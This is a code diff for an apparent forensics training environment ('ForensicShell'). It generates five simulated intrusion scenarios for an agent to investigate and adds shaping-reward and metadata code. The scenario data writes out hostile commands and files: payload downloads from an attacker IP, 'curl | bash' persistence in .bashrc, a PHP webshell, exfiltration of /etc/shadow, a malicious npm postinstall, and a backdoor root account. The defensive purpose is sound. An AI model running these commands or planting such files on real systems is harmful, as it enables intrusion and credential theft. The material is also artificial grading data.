| 8 |
+
The callable returns a dict describing:
|
| 9 |
+
- auth_log_lines: list[str] appended to /var/log/auth.log
|
| 10 |
+
- bash_history: str contents of the compromised user's .bash_history
|
| 11 |
+
- modified_files: dict[path, content] — system files changed by the attacker
|
| 12 |
+
- modified_paths: list[str] — the subset the grader expects (subset of modified_files)
|
| 13 |
+
- timeline: list[dict(phase, detail)] — 5-phase kill chain for hard tier
|
| 14 |
+
- pattern_tag: short slug used in task_id
|
| 15 |
+
|
| 16 |
+
All timestamps are rendered relative to ctx.ts_base (a datetime) so every log
|
| 17 |
+
looks self-consistent. Nothing here touches global random state.
|
| 18 |
+
"""
|
| 19 |
+
|
| 20 |
+
from datetime import timedelta
|
| 21 |
+
|
| 22 |
+
|
| 23 |
+
def _fmt_ts(ts):
|
| 24 |
+
return ts.strftime("%b %d %H:%M:%S")
|
| 25 |
+
|
| 26 |
+
|
| 27 |
+
# ---------------------------------------------------------------------------
|
| 28 |
+
# Pattern 1 — SSH brute force -> wget payload -> cron persistence
|
| 29 |
+
# ---------------------------------------------------------------------------
|
| 30 |
+
|
| 31 |
+
def ssh_brute(ctx):
|
| 32 |
+
user, ip, host = ctx.user, ctx.ip, ctx.host
|
| 33 |
+
ts = ctx.ts_base
|
| 34 |
+
auth = [
|
| 35 |
+
f"{_fmt_ts(ts)} {host} sshd[1811]: Failed password for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2",
|
| 36 |
+
f"{_fmt_ts(ts + timedelta(seconds=3))} {host} sshd[1813]: Failed password for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2",
|
| 37 |
+
f"{_fmt_ts(ts + timedelta(seconds=7))} {host} sshd[1815]: Failed password for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2",
|
| 38 |
+
f"{_fmt_ts(ts + timedelta(seconds=11))} {host} sshd[1822]: Accepted password for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2",
|
| 39 |
+
f"{_fmt_ts(ts + timedelta(seconds=11))} {host} sshd[1822]: pam_unix(sshd:session): session opened for user {user} by (uid=0)",
|
| 40 |
+
f"{_fmt_ts(ts + timedelta(minutes=1))} {host} sudo: {user} : TTY=pts/0 ; PWD=/home/{user} ; USER=root ; COMMAND=/bin/cp /tmp/.{ctx.short} /usr/local/bin/.{ctx.short}",
|
| 41 |
+
f"{_fmt_ts(ts + timedelta(minutes=1, seconds=5))} {host} sudo: {user} : TTY=pts/0 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/tee -a /etc/cron.d/{ctx.short}-sync",
|
| 42 |
+
]
|
| 43 |
+
bash = (
|
| 44 |
+
f"cd /tmp\n"
|
| 45 |
+
f"wget -q http://{ip}/payload/.{ctx.short}\n"
|
| 46 |
+
f"chmod +x .{ctx.short}\n"
|
| 47 |
+
f"sudo cp /tmp/.{ctx.short} /usr/local/bin/.{ctx.short}\n"
|
| 48 |
+
f"echo '* * * * * root /usr/local/bin/.{ctx.short} >/dev/null 2>&1' | sudo tee -a /etc/cron.d/{ctx.short}-sync\n"
|
| 49 |
+
f"history -c\n"
|
| 50 |
+
f"exit\n"
|
| 51 |
+
)
|
| 52 |
+
cron_path = f"/etc/cron.d/{ctx.short}-sync"
|
| 53 |
+
cron_content = (
|
| 54 |
+
f"# Managed by deploy\n"
|
| 55 |
+
f"0 3 * * * root /usr/local/sbin/logrotate.sh\n"
|
| 56 |
+
f"* * * * * root /usr/local/bin/.{ctx.short} >/dev/null 2>&1\n"
|
| 57 |
+
)
|
| 58 |
+
passwd_content = (
|
| 59 |
+
f"root:x:0:0:root:/root:/bin/bash\n"
|
| 60 |
+
f"{user}:x:1000:1000:{user.title()},,,:/home/{user}:/bin/bash\n"
|
| 61 |
+
f"sysd:x:0:0:System Daemon,,,:/var/lib/sysd:/bin/bash\n" # attacker-added backdoor acct
|
| 62 |
+
)
|
| 63 |
+
modified_files = {
|
| 64 |
+
"/etc/passwd": passwd_content,
|
| 65 |
+
cron_path: cron_content,
|
| 66 |
+
ctx.backdoor_path: ctx.backdoor_bytes,
|
| 67 |
+
}
|
| 68 |
+
timeline = [
|
| 69 |
+
{"phase": "login", "detail": f"ssh brute -> accepted from {ip}"},
|
| 70 |
+
{"phase": "recon", "detail": "whoami; id; uname -a"},
|
| 71 |
+
{"phase": "privesc", "detail": "sudo cp payload to /usr/local/bin"},
|
| 72 |
+
{"phase": "persistence", "detail": f"cron {cron_path} runs backdoor every minute"},
|
| 73 |
+
{"phase": "exfil", "detail": f"beacon POST to {ip}/beacon"},
|
| 74 |
+
]
|
| 75 |
+
return dict(
|
| 76 |
+
pattern_tag="ssh_brute",
|
| 77 |
+
auth_log_lines=auth,
|
| 78 |
+
bash_history=bash,
|
| 79 |
+
modified_files=modified_files,
|
| 80 |
+
modified_paths=["/etc/passwd", cron_path, ctx.backdoor_path],
|
| 81 |
+
timeline=timeline,
|
| 82 |
+
)
|
| 83 |
+
|
| 84 |
+
|
| 85 |
+
# ---------------------------------------------------------------------------
|
| 86 |
+
# Pattern 2 — stolen SSH key -> authorized_keys backdoor -> bashrc persistence
|
| 87 |
+
# ---------------------------------------------------------------------------
|
| 88 |
+
|
| 89 |
+
def ssh_key_theft(ctx):
|
| 90 |
+
user, ip, host = ctx.user, ctx.ip, ctx.host
|
| 91 |
+
ts = ctx.ts_base
|
| 92 |
+
fp = f"SHA256:{''.join(ctx.rng.choices('abcdef0123456789', k=16))}"
|
| 93 |
+
auth = [
|
| 94 |
+
f"{_fmt_ts(ts)} {host} sshd[522]: Accepted publickey for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2: RSA {fp}",
|
| 95 |
+
f"{_fmt_ts(ts + timedelta(seconds=1))} {host} sshd[522]: pam_unix(sshd:session): session opened for user {user} by (uid=0)",
|
| 96 |
+
f"{_fmt_ts(ts + timedelta(minutes=2))} {host} sudo: {user} : TTY=pts/1 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/tee -a /home/{user}/.ssh/authorized_keys",
|
| 97 |
+
f"{_fmt_ts(ts + timedelta(minutes=3))} {host} sudo: {user} : TTY=pts/1 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/tee -a /home/{user}/.bashrc",
|
| 98 |
+
]
|
| 99 |
+
bash = (
|
| 100 |
+
f"cat ~/.ssh/authorized_keys\n"
|
| 101 |
+
f"echo 'ssh-rsa AAAAB3NzaC1yc2E... attacker@stolen' >> ~/.ssh/authorized_keys\n"
|
| 102 |
+
f"echo 'curl -s http://{ip}/tick | bash >/dev/null 2>&1 &' >> ~/.bashrc\n"
|
| 103 |
+
f"chmod 600 ~/.ssh/authorized_keys\n"
|
| 104 |
+
f"history -c\n"
|
| 105 |
+
)
|
| 106 |
+
authorized_keys = (
|
| 107 |
+
f"ssh-rsa AAAAB3NzaC1yc2EA...legit-original-key {user}@laptop\n"
|
| 108 |
+
f"ssh-rsa AAAAB3NzaC1yc2EA...attacker-backdoor attacker@stolen\n"
|
| 109 |
+
)
|
| 110 |
+
bashrc = (
|
| 111 |
+
f"# ~/.bashrc\n"
|
| 112 |
+
f"alias ll='ls -la'\n"
|
| 113 |
+
f"export PATH=$PATH:/usr/local/bin\n"
|
| 114 |
+
f"curl -s http://{ip}/tick | bash >/dev/null 2>&1 &\n"
|
| 115 |
+
)
|
| 116 |
+
modified_files = {
|
| 117 |
+
f"/home/{user}/.ssh/authorized_keys": authorized_keys,
|
| 118 |
+
f"/home/{user}/.bashrc": bashrc,
|
| 119 |
+
ctx.backdoor_path: ctx.backdoor_bytes,
|
| 120 |
+
}
|
| 121 |
+
timeline = [
|
| 122 |
+
{"phase": "login", "detail": f"pubkey accepted from {ip} (stolen key)"},
|
| 123 |
+
{"phase": "recon", "detail": "cat authorized_keys; env"},
|
| 124 |
+
{"phase": "privesc", "detail": "already had sudo"},
|
| 125 |
+
{"phase": "persistence", "detail": "append attacker key to authorized_keys and bashrc"},
|
| 126 |
+
{"phase": "exfil", "detail": f"reverse shell to {ip} on login"},
|
| 127 |
+
]
|
| 128 |
+
return dict(
|
| 129 |
+
pattern_tag="ssh_key_theft",
|
| 130 |
+
auth_log_lines=auth,
|
| 131 |
+
bash_history=bash,
|
| 132 |
+
modified_files=modified_files,
|
| 133 |
+
modified_paths=[
|
| 134 |
+
f"/home/{user}/.ssh/authorized_keys",
|
| 135 |
+
f"/home/{user}/.bashrc",
|
| 136 |
+
ctx.backdoor_path,
|
| 137 |
+
],
|
| 138 |
+
timeline=timeline,
|
| 139 |
+
)
|
| 140 |
+
|
| 141 |
+
|
| 142 |
+
# ---------------------------------------------------------------------------
|
| 143 |
+
# Pattern 3 — webshell upload -> php drop -> curl exfil
|
| 144 |
+
# ---------------------------------------------------------------------------
|
| 145 |
+
|
| 146 |
+
def webshell(ctx):
|
| 147 |
+
user, ip, host = ctx.user, ctx.ip, ctx.host
|
| 148 |
+
ts = ctx.ts_base
|
| 149 |
+
auth = [
|
| 150 |
+
f"{_fmt_ts(ts)} {host} sshd[3001]: Accepted password for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2",
|
| 151 |
+
f"{_fmt_ts(ts + timedelta(minutes=4))} {host} sudo: {user} : TTY=pts/2 ; PWD=/var/www/html ; USER=www-data ; COMMAND=/usr/bin/vim shell.php",
|
| 152 |
+
]
|
| 153 |
+
bash = (
|
| 154 |
+
f"curl -sO http://{ip}/shell.php\n"
|
| 155 |
+
f"sudo mv shell.php /var/www/html/shell.php\n"
|
| 156 |
+
f"sudo chown www-data:www-data /var/www/html/shell.php\n"
|
| 157 |
+
f"curl -s http://localhost/shell.php?cmd=id\n"
|
| 158 |
+
f"curl -X POST -F file=@/etc/shadow http://{ip}/drop\n"
|
| 159 |
+
f"history -c\n"
|
| 160 |
+
)
|
| 161 |
+
webshell_content = (
|
| 162 |
+
b"<?php if (isset($_GET['cmd'])) { echo shell_exec($_GET['cmd']); } ?>\n"
|
| 163 |
+
)
|
| 164 |
+
modified_files = {
|
| 165 |
+
"/var/www/html/shell.php": webshell_content,
|
| 166 |
+
ctx.backdoor_path: ctx.backdoor_bytes,
|
| 167 |
+
}
|
| 168 |
+
# ensure unique paths
|
| 169 |
+
if ctx.backdoor_path == "/var/www/html/shell.php":
|
| 170 |
+
# extremely unlikely but guard anyway
|
| 171 |
+
modified_files[ctx.backdoor_path] = ctx.backdoor_bytes
|
| 172 |
+
timeline = [
|
| 173 |
+
{"phase": "login", "detail": f"ssh from {ip}"},
|
| 174 |
+
{"phase": "recon", "detail": "ls /var/www/html; id"},
|
| 175 |
+
{"phase": "privesc", "detail": "sudo mv shell.php; chown www-data"},
|
| 176 |
+
{"phase": "persistence", "detail": "php webshell at /var/www/html/shell.php"},
|
| 177 |
+
{"phase": "exfil", "detail": f"curl POST /etc/shadow to {ip}/drop"},
|
| 178 |
+
]
|
| 179 |
+
return dict(
|
| 180 |
+
pattern_tag="webshell",
|
| 181 |
+
auth_log_lines=auth,
|
| 182 |
+
bash_history=bash,
|
| 183 |
+
modified_files=modified_files,
|
| 184 |
+
modified_paths=["/var/www/html/shell.php", ctx.backdoor_path],
|
| 185 |
+
timeline=timeline,
|
| 186 |
+
)
|
| 187 |
+
|
| 188 |
+
|
| 189 |
+
# ---------------------------------------------------------------------------
|
| 190 |
+
# Pattern 4 — supply-chain compromised package -> /usr/lib drop
|
| 191 |
+
# ---------------------------------------------------------------------------
|
| 192 |
+
|
| 193 |
+
def supply_chain(ctx):
|
| 194 |
+
user, ip, host = ctx.user, ctx.ip, ctx.host
|
| 195 |
+
ts = ctx.ts_base
|
| 196 |
+
pkg = ctx.rng.choice(["leftpad-js", "event-stream", "colors-fix", "pytype-helper"])
|
| 197 |
+
auth = [
|
| 198 |
+
f"{_fmt_ts(ts)} {host} sshd[901]: Accepted publickey for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2",
|
| 199 |
+
f"{_fmt_ts(ts + timedelta(minutes=3))} {host} sudo: {user} : TTY=pts/0 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/npm install -g {pkg}",
|
| 200 |
+
]
|
| 201 |
+
bash = (
|
| 202 |
+
f"npm view {pkg}\n"
|
| 203 |
+
f"sudo npm install -g {pkg}\n"
|
| 204 |
+
f"node -e 'require(\"{pkg}\")'\n"
|
| 205 |
+
f"ls /usr/lib/node_modules/{pkg}/\n"
|
| 206 |
+
f"history -c\n"
|
| 207 |
+
)
|
| 208 |
+
postinstall = (
|
| 209 |
+
f"// postinstall.js -- dropped by malicious {pkg}\n"
|
| 210 |
+
"const { exec } = require('child_process');\n"
|
| 211 |
+
f"exec('curl -s http://{ip}/b -o /tmp/.{ctx.short} && chmod +x /tmp/.{ctx.short} && /tmp/.{ctx.short} &');\n"
|
| 212 |
+
)
|
| 213 |
+
modified_files = {
|
| 214 |
+
f"/usr/lib/node_modules/{pkg}/postinstall.js": postinstall,
|
| 215 |
+
ctx.backdoor_path: ctx.backdoor_bytes,
|
| 216 |
+
}
|
| 217 |
+
timeline = [
|
| 218 |
+
{"phase": "login", "detail": f"pubkey from {ip}"},
|
| 219 |
+
{"phase": "recon", "detail": f"npm view {pkg}"},
|
| 220 |
+
{"phase": "privesc", "detail": f"sudo npm install -g {pkg} runs postinstall as root"},
|
| 221 |
+
{"phase": "persistence", "detail": f"{pkg} postinstall drops /tmp/.{ctx.short}"},
|
| 222 |
+
{"phase": "exfil", "detail": f"backdoor beacons to {ip}"},
|
| 223 |
+
]
|
| 224 |
+
return dict(
|
| 225 |
+
pattern_tag="supply_chain",
|
| 226 |
+
auth_log_lines=auth,
|
| 227 |
+
bash_history=bash,
|
| 228 |
+
modified_files=modified_files,
|
| 229 |
+
modified_paths=[f"/usr/lib/node_modules/{pkg}/postinstall.js", ctx.backdoor_path],
|
| 230 |
+
timeline=timeline,
|
| 231 |
+
)
|
| 232 |
+
|
| 233 |
+
|
| 234 |
+
# ---------------------------------------------------------------------------
|
| 235 |
+
# Pattern 5 — insider threat: legit user exfiltrates db from internal network
|
| 236 |
+
# ---------------------------------------------------------------------------
|
| 237 |
+
|
| 238 |
+
def insider(ctx):
|
| 239 |
+
user, ip, host = ctx.user, ctx.ip, ctx.host
|
| 240 |
+
ts = ctx.ts_base
|
| 241 |
+
# insider uses internal network, not public IP, so override
|
| 242 |
+
auth = [
|
| 243 |
+
f"{_fmt_ts(ts)} {host} sshd[415]: Accepted publickey for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2",
|
| 244 |
+
f"{_fmt_ts(ts + timedelta(minutes=2))} {host} sudo: {user} : TTY=pts/3 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/mysqldump --all-databases",
|
| 245 |
+
f"{_fmt_ts(ts + timedelta(minutes=5))} {host} sudo: {user} : TTY=pts/3 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/rsync -av /var/lib/mysql/dump.sql /tmp/.staging",
|
| 246 |
+
]
|
| 247 |
+
bash = (
|
| 248 |
+
f"sudo mysqldump --all-databases > /var/lib/mysql/dump.sql\n"
|
| 249 |
+
f"sudo rsync -av /var/lib/mysql/dump.sql /tmp/.staging/\n"
|
| 250 |
+
f"scp /tmp/.staging/dump.sql {user}@laptop.internal:/tmp/\n"
|
| 251 |
+
f"rm /tmp/.staging/dump.sql\n"
|
| 252 |
+
f"history -c\n"
|
| 253 |
+
)
|
| 254 |
+
dump_content = b"-- MySQL dump (exfiltrated)\nCREATE TABLE users (id INT, email VARCHAR(255));\n"
|
| 255 |
+
staging_content = b"-- staged copy\n" + dump_content
|
| 256 |
+
modified_files = {
|
| 257 |
+
"/var/lib/mysql/dump.sql": dump_content,
|
| 258 |
+
"/tmp/.staging/dump.sql": staging_content,
|
| 259 |
+
ctx.backdoor_path: ctx.backdoor_bytes,
|
| 260 |
+
}
|
| 261 |
+
timeline = [
|
| 262 |
+
{"phase": "login", "detail": f"pubkey from internal {ip} (legit creds abused)"},
|
| 263 |
+
{"phase": "recon", "detail": "ls /var/lib/mysql"},
|
| 264 |
+
{"phase": "privesc", "detail": "user already had sudo"},
|
| 265 |
+
{"phase": "persistence", "detail": "staging dir /tmp/.staging persists data"},
|
| 266 |
+
{"phase": "exfil", "detail": "scp dump.sql to laptop.internal"},
|
| 267 |
+
]
|
| 268 |
+
return dict(
|
| 269 |
+
pattern_tag="insider",
|
| 270 |
+
auth_log_lines=auth,
|
| 271 |
+
bash_history=bash,
|
| 272 |
+
modified_files=modified_files,
|
| 273 |
+
modified_paths=[
|
| 274 |
+
"/var/lib/mysql/dump.sql",
|
| 275 |
+
"/tmp/.staging/dump.sql",
|
| 276 |
+
ctx.backdoor_path,
|
| 277 |
+
],
|
| 278 |
+
timeline=timeline,
|
| 279 |
+
)
|
| 280 |
+
|
| 281 |
+
|
| 282 |
+
PATTERNS = {
|
| 283 |
+
"ssh_brute": ssh_brute,
|
| 284 |
+
"ssh_key_theft": ssh_key_theft,
|
| 285 |
+
"webshell": webshell,
|
| 286 |
+
"supply_chain": supply_chain,
|
| 287 |
+
"insider": insider,
|
| 288 |
+
}
|
server/forensic_shell_environment.py
CHANGED
|
@@ -11,11 +11,12 @@ a reward in [0.0, 1.0] on the terminal step.
|
|
| 11 |
|
| 12 |
import hashlib
|
| 13 |
import os
|
|
|
|
| 14 |
from typing import Dict, List, Optional, Tuple
|
| 15 |
from uuid import uuid4
|
| 16 |
|
| 17 |
from openenv.core.env_server.interfaces import Environment
|
| 18 |
-
from openenv.core.env_server.types import State
|
| 19 |
|
| 20 |
try:
|
| 21 |
from ..models import ForensicShellAction, ForensicShellObservation
|
|
@@ -24,14 +25,49 @@ except ImportError:
|
|
| 24 |
|
| 25 |
try:
|
| 26 |
from .grader import grade
|
|
|
|
| 27 |
from .scenarios import DEFAULT_TASK_ID, SCENARIOS
|
| 28 |
except ImportError:
|
| 29 |
-
from grader import grade
|
| 30 |
-
from
|
|
|
|
| 31 |
|
| 32 |
|
| 33 |
MAX_STEPS_PER_EPISODE = 30
|
| 34 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 35 |
|
| 36 |
def _as_bytes(content) -> bytes:
|
| 37 |
if isinstance(content, bytes):
|
|
@@ -68,22 +104,47 @@ class ForensicShellEnvironment(Environment):
|
|
| 68 |
self._fs: Dict[str, object] = {}
|
| 69 |
self._done: bool = False
|
| 70 |
self._steps_used: int = 0
|
|
|
|
|
|
|
|
|
|
| 71 |
|
| 72 |
# ---- episode lifecycle ---------------------------------------------------
|
| 73 |
|
| 74 |
def reset(
|
| 75 |
-
self,
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 76 |
) -> ForensicShellObservation:
|
| 77 |
-
|
| 78 |
-
|
| 79 |
-
|
| 80 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 81 |
|
| 82 |
-
self._task_id = chosen
|
| 83 |
-
self._scenario = SCENARIOS[chosen]
|
| 84 |
self._fs = dict(self._scenario["filesystem"])
|
| 85 |
self._done = False
|
| 86 |
self._steps_used = 0
|
|
|
|
|
|
|
|
|
|
| 87 |
self._state = State(episode_id=str(uuid4()), step_count=0)
|
| 88 |
|
| 89 |
return ForensicShellObservation(
|
|
@@ -142,12 +203,16 @@ class ForensicShellEnvironment(Environment):
|
|
| 142 |
return self._obs(output=out, steps_remaining=steps_remaining, error=err, done=False, reward=0.0)
|
| 143 |
|
| 144 |
if verb == "read_file":
|
| 145 |
-
|
| 146 |
-
|
|
|
|
|
|
|
| 147 |
|
| 148 |
if verb == "grep":
|
| 149 |
-
|
| 150 |
-
|
|
|
|
|
|
|
| 151 |
|
| 152 |
if verb == "stat":
|
| 153 |
out, err = self._do_stat(action.path or "")
|
|
@@ -173,6 +238,25 @@ class ForensicShellEnvironment(Environment):
|
|
| 173 |
reward=0.0,
|
| 174 |
)
|
| 175 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 176 |
# ---- action primitives ---------------------------------------------------
|
| 177 |
|
| 178 |
def _do_list_dir(self, path: str) -> Tuple[str, Optional[str]]:
|
|
@@ -284,8 +368,37 @@ class ForensicShellEnvironment(Environment):
|
|
| 284 |
metadata=meta,
|
| 285 |
)
|
| 286 |
|
| 287 |
-
# ---- state
|
| 288 |
|
| 289 |
@property
|
| 290 |
def state(self) -> State:
|
| 291 |
return self._state
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 11 |
|
| 12 |
import hashlib
|
| 13 |
import os
|
| 14 |
+
from pathlib import Path
|
| 15 |
from typing import Dict, List, Optional, Tuple
|
| 16 |
from uuid import uuid4
|
| 17 |
|
| 18 |
from openenv.core.env_server.interfaces import Environment
|
| 19 |
+
from openenv.core.env_server.types import EnvironmentMetadata, State
|
| 20 |
|
| 21 |
try:
|
| 22 |
from ..models import ForensicShellAction, ForensicShellObservation
|
|
|
|
| 25 |
|
| 26 |
try:
|
| 27 |
from .grader import grade
|
| 28 |
+
from .scenario_generator import generate_scenario
|
| 29 |
from .scenarios import DEFAULT_TASK_ID, SCENARIOS
|
| 30 |
except ImportError:
|
| 31 |
+
from grader import grade # type: ignore
|
| 32 |
+
from scenario_generator import generate_scenario # type: ignore
|
| 33 |
+
from scenarios import DEFAULT_TASK_ID, SCENARIOS # type: ignore
|
| 34 |
|
| 35 |
|
| 36 |
MAX_STEPS_PER_EPISODE = 30
|
| 37 |
|
| 38 |
+
# Exploration shaping reward — small positive reward the first time the agent
|
| 39 |
+
# reads one of the scenario's "canonical forensic artifacts" (auth.log, bash
|
| 40 |
+
# histories, cron files, backdoor path, etc.). Capped so the terminal grader
|
| 41 |
+
# reward always dominates the trajectory return.
|
| 42 |
+
SHAPING_REWARD_PER_READ = 0.02
|
| 43 |
+
SHAPING_REWARD_CAP = 0.10
|
| 44 |
+
|
| 45 |
+
|
| 46 |
+
def _canonical_artifacts(scenario: dict) -> set:
|
| 47 |
+
"""
|
| 48 |
+
Pick out the set of paths in a scenario that a good investigator *should*
|
| 49 |
+
read. For hand-authored scenarios we use the ground-truth modified_files
|
| 50 |
+
plus a fixed set of classic forensic log paths. For generated scenarios we
|
| 51 |
+
also include the bash history of the compromised user.
|
| 52 |
+
"""
|
| 53 |
+
gt = scenario.get("ground_truth", {}) or {}
|
| 54 |
+
paths: set = set()
|
| 55 |
+
paths.update(gt.get("modified_files", []) or [])
|
| 56 |
+
for p in (
|
| 57 |
+
"/var/log/auth.log",
|
| 58 |
+
"/var/log/auth.log.1",
|
| 59 |
+
"/etc/passwd",
|
| 60 |
+
"/etc/shadow",
|
| 61 |
+
):
|
| 62 |
+
if p in scenario.get("filesystem", {}):
|
| 63 |
+
paths.add(p)
|
| 64 |
+
user = gt.get("compromised_user")
|
| 65 |
+
if user:
|
| 66 |
+
bh = f"/home/{user}/.bash_history"
|
| 67 |
+
if bh in scenario.get("filesystem", {}):
|
| 68 |
+
paths.add(bh)
|
| 69 |
+
return paths
|
| 70 |
+
|
| 71 |
|
| 72 |
def _as_bytes(content) -> bytes:
|
| 73 |
if isinstance(content, bytes):
|
|
|
|
| 104 |
self._fs: Dict[str, object] = {}
|
| 105 |
self._done: bool = False
|
| 106 |
self._steps_used: int = 0
|
| 107 |
+
self._useful_read: set = set() # paths already rewarded
|
| 108 |
+
self._shaping_total: float = 0.0 # running sum, capped at SHAPING_REWARD_CAP
|
| 109 |
+
self._canonical: set = set() # per-episode canonical artifact set
|
| 110 |
|
| 111 |
# ---- episode lifecycle ---------------------------------------------------
|
| 112 |
|
| 113 |
def reset(
|
| 114 |
+
self,
|
| 115 |
+
task_id: Optional[str] = None,
|
| 116 |
+
seed: Optional[int] = None,
|
| 117 |
+
difficulty: Optional[int] = None,
|
| 118 |
+
pattern: Optional[str] = None,
|
| 119 |
+
**kwargs,
|
| 120 |
) -> ForensicShellObservation:
|
| 121 |
+
"""
|
| 122 |
+
Load either a hand-authored scenario (by task_id) OR a procedurally
|
| 123 |
+
generated one (by seed+difficulty+pattern). If seed is given, generator
|
| 124 |
+
wins; otherwise fall back to task_id lookup, then DEFAULT_TASK_ID.
|
| 125 |
+
"""
|
| 126 |
+
if seed is not None:
|
| 127 |
+
scenario = generate_scenario(
|
| 128 |
+
seed=int(seed),
|
| 129 |
+
difficulty=int(difficulty) if difficulty is not None else 3,
|
| 130 |
+
pattern=pattern,
|
| 131 |
+
)
|
| 132 |
+
self._task_id = scenario["task_id"]
|
| 133 |
+
self._scenario = scenario
|
| 134 |
+
else:
|
| 135 |
+
env_task = os.getenv("FORENSIC_TASK_ID")
|
| 136 |
+
chosen = task_id or env_task or DEFAULT_TASK_ID
|
| 137 |
+
if chosen not in SCENARIOS:
|
| 138 |
+
chosen = DEFAULT_TASK_ID
|
| 139 |
+
self._task_id = chosen
|
| 140 |
+
self._scenario = SCENARIOS[chosen]
|
| 141 |
|
|
|
|
|
|
|
| 142 |
self._fs = dict(self._scenario["filesystem"])
|
| 143 |
self._done = False
|
| 144 |
self._steps_used = 0
|
| 145 |
+
self._useful_read = set()
|
| 146 |
+
self._shaping_total = 0.0
|
| 147 |
+
self._canonical = _canonical_artifacts(self._scenario)
|
| 148 |
self._state = State(episode_id=str(uuid4()), step_count=0)
|
| 149 |
|
| 150 |
return ForensicShellObservation(
|
|
|
|
| 203 |
return self._obs(output=out, steps_remaining=steps_remaining, error=err, done=False, reward=0.0)
|
| 204 |
|
| 205 |
if verb == "read_file":
|
| 206 |
+
path = action.path or ""
|
| 207 |
+
out, err = self._do_read_file(path, action.max_bytes or 2048)
|
| 208 |
+
shaped = self._award_shaping(path) if err is None else 0.0
|
| 209 |
+
return self._obs(output=out, steps_remaining=steps_remaining, error=err, done=False, reward=shaped)
|
| 210 |
|
| 211 |
if verb == "grep":
|
| 212 |
+
path = action.path or ""
|
| 213 |
+
out, err = self._do_grep(action.pattern or "", path)
|
| 214 |
+
shaped = self._award_shaping(path) if err is None else 0.0
|
| 215 |
+
return self._obs(output=out, steps_remaining=steps_remaining, error=err, done=False, reward=shaped)
|
| 216 |
|
| 217 |
if verb == "stat":
|
| 218 |
out, err = self._do_stat(action.path or "")
|
|
|
|
| 238 |
reward=0.0,
|
| 239 |
)
|
| 240 |
|
| 241 |
+
# ---- shaping reward -----------------------------------------------------
|
| 242 |
+
|
| 243 |
+
def _award_shaping(self, path: str) -> float:
|
| 244 |
+
"""
|
| 245 |
+
Return +SHAPING_REWARD_PER_READ the first time the agent touches a
|
| 246 |
+
canonical forensic artifact, capped so the cumulative shaping stays
|
| 247 |
+
<= SHAPING_REWARD_CAP across the episode.
|
| 248 |
+
"""
|
| 249 |
+
if not path or path not in self._canonical:
|
| 250 |
+
return 0.0
|
| 251 |
+
if path in self._useful_read:
|
| 252 |
+
return 0.0
|
| 253 |
+
if self._shaping_total + 1e-9 >= SHAPING_REWARD_CAP:
|
| 254 |
+
return 0.0
|
| 255 |
+
self._useful_read.add(path)
|
| 256 |
+
grant = min(SHAPING_REWARD_PER_READ, SHAPING_REWARD_CAP - self._shaping_total)
|
| 257 |
+
self._shaping_total += grant
|
| 258 |
+
return float(grant)
|
| 259 |
+
|
| 260 |
# ---- action primitives ---------------------------------------------------
|
| 261 |
|
| 262 |
def _do_list_dir(self, path: str) -> Tuple[str, Optional[str]]:
|
|
|
|
| 368 |
metadata=meta,
|
| 369 |
)
|
| 370 |
|
| 371 |
+
# ---- state + metadata ----------------------------------------------------
|
| 372 |
|
| 373 |
@property
|
| 374 |
def state(self) -> State:
|
| 375 |
return self._state
|
| 376 |
+
|
| 377 |
+
def get_metadata(self) -> EnvironmentMetadata:
|
| 378 |
+
"""
|
| 379 |
+
Override the OpenEnv default to populate the /metadata endpoint with a real
|
| 380 |
+
name, description, embedded README, version, author, and docs URL — instead
|
| 381 |
+
of the boilerplate auto-derived from the class name.
|
| 382 |
+
"""
|
| 383 |
+
readme_path = Path(__file__).resolve().parent.parent / "README.md"
|
| 384 |
+
readme_content: Optional[str] = None
|
| 385 |
+
if readme_path.exists():
|
| 386 |
+
try:
|
| 387 |
+
readme_content = readme_path.read_text(encoding="utf-8")
|
| 388 |
+
except OSError:
|
| 389 |
+
readme_content = None
|
| 390 |
+
return EnvironmentMetadata(
|
| 391 |
+
name="ForensicShell",
|
| 392 |
+
description=(
|
| 393 |
+
"Digital-forensics investigation environment for OpenEnv RL. The "
|
| 394 |
+
"agent reads logs, hashes backdoors, and reconstructs attacker "
|
| 395 |
+
"kill-chains across 5 attack patterns and 5 difficulty tiers. "
|
| 396 |
+
"Procedural scenarios via deterministic seeds; deterministic "
|
| 397 |
+
"graders return rewards in [0, 1] with partial credit (Jaccard, "
|
| 398 |
+
"F1, Kendall-tau)."
|
| 399 |
+
),
|
| 400 |
+
readme_content=readme_content,
|
| 401 |
+
version="0.2.0",
|
| 402 |
+
author="yashppawar",
|
| 403 |
+
